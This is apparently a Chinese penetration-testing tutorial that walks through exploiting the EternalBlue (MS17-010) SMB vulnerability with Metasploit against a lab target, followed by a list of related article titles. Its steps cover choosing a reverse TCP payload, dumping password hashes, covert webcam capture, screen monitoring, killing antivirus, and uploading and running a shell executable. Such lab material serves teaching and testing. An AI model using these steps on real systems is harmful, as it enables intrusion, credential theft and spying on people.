1、通过命令“msfconsole”启动msf,或者通过菜单启动msf

msf模块说明:

exploits:攻击模块,利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,从而获得对远程目标系统访问权限 的代码组件。

auxiliary:辅助模块,为渗透测试信息搜集提供了大量的辅助模块支持,如负责扫描、收集、嗅探、指纹识别、口令猜测等。

payloads:攻击载荷模块,攻击成功后促使靶机运行的一段植入代码。

post:后渗透攻击模块,收集更多信息或进一步访问被利用的目标系统。

encoders:编码模块,将攻击载荷进行编码,来绕过防护软件拦截。

2、通过"show exploits"命令,可以查看当前2099个攻击模块,如下部份截图。

3、模块太多,通过关键字搜索“永恒之蓝”漏洞编号“ms17”进行搜索可以看到前序号为6的攻击模块就是要用的,所以输入命令“use 6”,代表当前使用这个模块进行攻击。

4、通过输入option命令显示当前攻击利用模块所需填入的参数,required是必填的,如下图除了RHOSTS需要填入攻击主机IP外,其它都有默认值,所以这里只需要设置rhost即可。

设置好后的参数如下:

5、验证靶机445端口是否开启,否则就不能利用,从下图可以看到445端口是open状态,即可以利用。

6、通过运行“run”命令,扫描靶机,可以看到第一行己经识别出来了有可能能利用ms17漏洞,而且还识别出来了靶机系统的信息。

7、上面己经进行了扫描也确定了可以利用ms17漏洞进行攻击,哪么接下来就得利用msf提供的攻击载荷模块,如下进行search ms17后从序号7~10都是相关的攻击载荷模块,这里永恒之蓝要用到的则是序号为8的模块。

8、通过show payloads显示所有载荷模块,这里需要用到的是tcp反向连接的方式。所以 use 15,表示要使用序号为15的载荷模块。

9、设置payload攻击的目标地址

10、通过 "run" 进行攻击,从如下图可以看出己经攻击成功了。

通过getuid说明己经拿到了system权限

通过shell命令,可以直接连接靶机的dos命令窗口

11、攻击成功后可以把当前进程放入后台,这样就可以再重新攻击别的机器。

通过hashdump获取当前系统的密码

12、获得了meterpreter后我们还能做些其它操作

webcam_list:查看摄像头

webcam_snap:通过摄像头拍照

webcam_stream:通过摄像头开启视频

screenshost:获取屏幕截图

screenshare:实时监控桌面

shutdown:关闭目标机器

run killav:关闭杀毒软件

run getgui-e 启用远程桌面

download C:\\1.txt 1.txt下载文件

upload /var/www/shell.exe  D:\\shell.exe上传文件

execute -f shell.exe 执行文件

13、进程迁移,在进程少稳定的情况下,可以把当前会话进程迁移到其它进程上去。

kali通过msf利用永恒之蓝攻击服务器相关推荐

  1. MS17-010漏洞攻击与防御(利用永恒之蓝攻击Win7系统)

    任务1 利用永恒之蓝攻击Win7系统 在Kali终端中输入命令"msfconsole ",启动Metasploit:输入命令"use auxiliary/scanner/ ...

  2. MSF利用永恒之蓝渗透win2003

    1.信息收集 (1)使用Nmap工具进行扫描,发现开放了445端口,尝试利用ms17_010漏洞. (2)运行metasploit. 2.漏洞探测 (1)查看漏洞模块. (2)使用Auxiliary ...

  3. 利用永恒之蓝入侵服务器复制文件,msf利用永恒之蓝进行漏洞攻击

    1. 永恒之蓝Eternalblue 攻击 Eternalblue 通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞 恶意代码会扫描开放445文件共享端口的Windows机器, ...

  4. 利用永恒之蓝入侵服务器复制文件,永恒之蓝漏洞利用复现(示例代码)

    一.环境搭建: IP地址 系统信息 备注 角色 192.168.0.244 win7旗舰版(未安装MS17-010补丁版本) 需开启445端口及SMB协议 靶机 192.168.0.105 win7旗 ...

  5. 经典利用永恒之蓝漏洞对Windows操作系统进行攻击

    利用永恒之蓝对Windows进行攻击 环境搭建:kali.Windows server 2008R2.Windows 7,其中Windows server 2008R2\WIN7为靶机. 首先简单介绍 ...

  6. 利用永恒之蓝漏洞+修复方法(MS17-010)

    文章目录 利用永恒之蓝漏洞+修复方法(MS17-010) 1.环境 2.信息收集 3.使用MSF的永恒之蓝模块 4.使用ms17_010模块,对靶机进行扫描 5.1使用ms17_010模块,对靶机进行 ...

  7. 利用永恒之蓝渗透WIN7

    实验名称:利用永恒之蓝渗透win7 实验人:xx 实验日期:2021.9.24 实验目的:通过已知漏洞攻击目标服务器并拿到shell 实验环境: kali:172.16.12.30 win7靶机:17 ...

  8. 模拟“永恒之蓝”攻击,实现系统提权

    实验目的: 使用Kali Linux平台的"metasploit framework"工具,针对Windows7操作系统模拟"永恒之蓝"攻击,实现系统提权. 实 ...

  9. python调用msfconsole全自动永恒之蓝攻击_使用Metasploit复现永恒之蓝攻击

    1.Metaspolit介绍 Metasploit是一个免费的.可下载的框架,通过它可以很容易地获取.开发并对计算机软件漏洞实施攻击.它本身附带数百个已知软件漏洞的专业级漏洞攻击工具,并保持着频繁更新 ...

  10. 蠕虫病毒利用永恒之蓝漏洞传播 单位局域网受威胁最大

    一. 概述 日前,火绒安全团队通过"火绒威胁情报系统"发现蠕虫病毒"Worm/Sharp"正在全网传播,其中在政府.企业.学校.医院等单位的局域网具有非常强的传 ...

最新文章

  1. vuex中获取的数据使用v-model绑定出问题
  2. Win7最高权限问题
  3. mysql bin的过期时间_Mysql设置binlog过期时间并自动删除
  4. The 2014 ACM-ICPC Asia Mudanjiang Regional First Round A
  5. mysql udf编译_MySql UDF 调用外部程序和系统命令
  6. nssl1448-小智过马路【模拟】
  7. CAN总线(1)--初探(更新中)
  8. CentOS7服务管理(重启,停止,自动启动命令)
  9. java overriding_JAVA概念:Overloading与Overriding
  10. 面向对象的Python编程,你需要知道这些!
  11. Oracle 存储过程的创建,及触发器调用存储过程
  12. windows清理系统垃圾bat脚本
  13. ios uri正则表达式_众果搜的博客
  14. 淘宝美工图片处理规范
  15. Android BLE4.+ 蓝牙开发国产手机兼容性解决方案
  16. mysql最高平均工资_mysql查询出平均工资最高的部门编号
  17. IE8和IE9发送跨域请求
  18. 免费下载各种json包的网址
  19. windows驱动开发3:第一个驱动及调试
  20. python 实现图片加密

热门文章

  1. mysql导出excelsql语句乱码_excel打开是乱码-悄悄告诉你,MySQL 通过SQL语句导出到Excel的方法...
  2. 流控大师 panabit
  3. MFC release 发送到桌面快捷方式图标问题
  4. c语言中整形常量表达形式,C语言中整型常量的表示方法.doc
  5. glassfish插件_在Eclipse JavaEE开发环境上集成GlassFish开发插件(截图多多)
  6. 卓一笔记---局部描述符表(LDT寻址表)的使用
  7. 前方高能!阿里云双11拼团百团大战已开启!
  8. 实现主人领养宠物并带宠物去玩,狗狗叼飞碟,企鹅去南极游泳
  9. Vue-html5-editor 编辑器的使用及一些问题解决
  10. 腾讯2020校园招聘笔试